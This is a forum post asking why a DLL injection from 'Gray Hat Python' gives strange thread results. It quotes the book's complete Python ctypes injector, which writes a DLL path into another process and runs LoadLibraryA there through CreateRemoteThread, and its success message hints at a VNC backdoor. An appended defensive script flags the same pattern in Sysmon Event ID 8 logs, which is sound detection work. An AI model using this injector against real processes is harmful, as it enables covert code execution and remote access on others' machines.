Forum posts for ntkrnlpa.exe

Strange results while trying to inject a dll into a process via windll.kernel32.CreateRemote…

I am trying the following task:
1. inject a DLL into a process;
2. use windll.kernel32.CreateRemoteThread() through Python's ctypes;

And I am encountering the following results:
1. the new thread is created successfully; but
2. I cannot grab this thread via WinDbg;
3. the call stack (grabbed via Process Explorer) is strange:

ntkrnlpa.exe!KiUnexpectedInterrupt+0x8d
ntkrnlpa.exe!PsDereferencePrimaryToken+0x362
ntkrnlpa.exe!KiDeliverApc+0xb3
ntkrnlpa.exe!ZwYieldExecution+0x19a4
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x29b56
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2ac2b
ntkrnlpa.exe!LsaDeregisterLogonProcess+0x2b20b
ntkrnlpa.exe!PsRemoveCreateThreadNotifyRoutine+0x11d
ntkrnlpa.exe!KiDispatchInterrupt+0x5a2
kernel32.dll!CreateThread+0x22


The code is from 'Gray Hat Python', and it's like this:

import sys
from ctypes import *

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
pid = sys.argv[1]
dll_path = sys.argv[2]
dll_len = len(dll_path)

# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
    print "[*] Couldn't acquire a handle to PID: %s" % pid
    sys.exit(0)

# Allocate some space for the DLL path
arg_address = kernel32.VirtualAllocEx( h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)

# Write the DLL path into the allocated space
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

# We need to resolve the address for LoadLibraryA
h_kernel32 = kernel32.GetModuleHandleA('kernel32.dll')
h_loadlib = kernel32.GetProcAddress(h_kernel32,'LoadLibraryA')

# Now we try to create the remote thread, with the entry point set
# to LoadLibraryA and a pointer to the DLL path as its single parameter
thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process,None,0,h_loadlib,arg_address,0,byref(thread_id)):
    print "[*] Failed to inject the DLL. Exiting."
    sys.exit(0)

print "[*] Remote thread successfully created with a thread ID of: 0x%08x" % thread_id.value
print "[*] VNC Connection now open and ready for action...."
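From the monitored host's side, the CreateRemoteThread-into-LoadLibraryA pattern in the post above is exactly what Sysmon records as Event ID 8 (CreateRemoteThread), so here is an added detection example that is not part of the original post or of Gray Hat Python: it parses event records in their exported Event XML form and flags remote threads whose entry point is a LoadLibrary export. The Sysmon field names (SourceImage, TargetImage, StartModule, StartFunction, NewThreadId) are real; the two sample events, their PIDs, paths and addresses are constructed.

```python
"""Flag Sysmon Event ID 8 (CreateRemoteThread) records whose new thread starts
at a LoadLibrary export: the host-side trace of a LoadLibraryA injector."""
import xml.etree.ElementTree as ET
# Sysmon resolves StartFunction from the start module's export table; a remote
# thread entering one of these is the CreateRemoteThread -> LoadLibrary pattern.
LOADER_FUNCTIONS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
# Constructed sample events, not real telemetry: the first mirrors the injector
# above (python.exe starts a thread in notepad.exe at LoadLibraryA), the second
# is a benign cross-process thread from the console subsystem.
SAMPLE_EVENTS = [
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System><EventID>8</EventID></System><EventData>
    <Data Name="SourceProcessId">1234</Data><Data Name="SourceImage">C:\Python27\python.exe</Data>
    <Data Name="TargetProcessId">4321</Data><Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
    <Data Name="NewThreadId">5555</Data><Data Name="StartAddress">0x7C801D7B</Data>
    <Data Name="StartModule">C:\Windows\System32\kernel32.dll</Data>
    <Data Name="StartFunction">LoadLibraryA</Data></EventData></Event>""",
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
    <System><EventID>8</EventID></System><EventData>
    <Data Name="SourceProcessId">600</Data><Data Name="SourceImage">C:\Windows\System32\csrss.exe</Data>
    <Data Name="TargetProcessId">4321</Data><Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
    <Data Name="NewThreadId">5556</Data><Data Name="StartAddress">0x7C80F6A2</Data>
    <Data Name="StartModule">C:\Windows\System32\kernel32.dll</Data>
    <Data Name="StartFunction">CtrlRoutine</Data></EventData></Event>""",
]

def parse_event(xml_text):
    """Return (EventID, {Data Name: value}) from one Sysmon event record."""
    root = ET.fromstring(xml_text)
    event_id, fields = None, {}
    for node in root.iter():
        tag = node.tag.rsplit("}", 1)[-1]  # drop the XML namespace
        if tag == "EventID":
            event_id = int(node.text)
        elif tag == "Data" and "Name" in node.attrib:
            fields[node.attrib["Name"]] = (node.text or "").strip()
    return event_id, fields

def is_loadlibrary_injection(event_id, fields):
    # Only Event ID 8 is a cross-process thread; match on its resolved entry point.
    return event_id == 8 and fields.get("StartFunction") in LOADER_FUNCTIONS

def find_injections(events):
    """Return (source image, target image, new thread id) for every hit."""
    hits = []
    for xml_text in events:
        event_id, fields = parse_event(xml_text)
        if is_loadlibrary_injection(event_id, fields):
            hits.append((fields["SourceImage"], fields["TargetImage"], fields["NewThreadId"]))
    return hits
```

A thread whose StartModule is empty (start address in unbacked memory) is the other common Event ID 8 signal, but that is a different injection style from the LoadLibrary one shown in the post.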
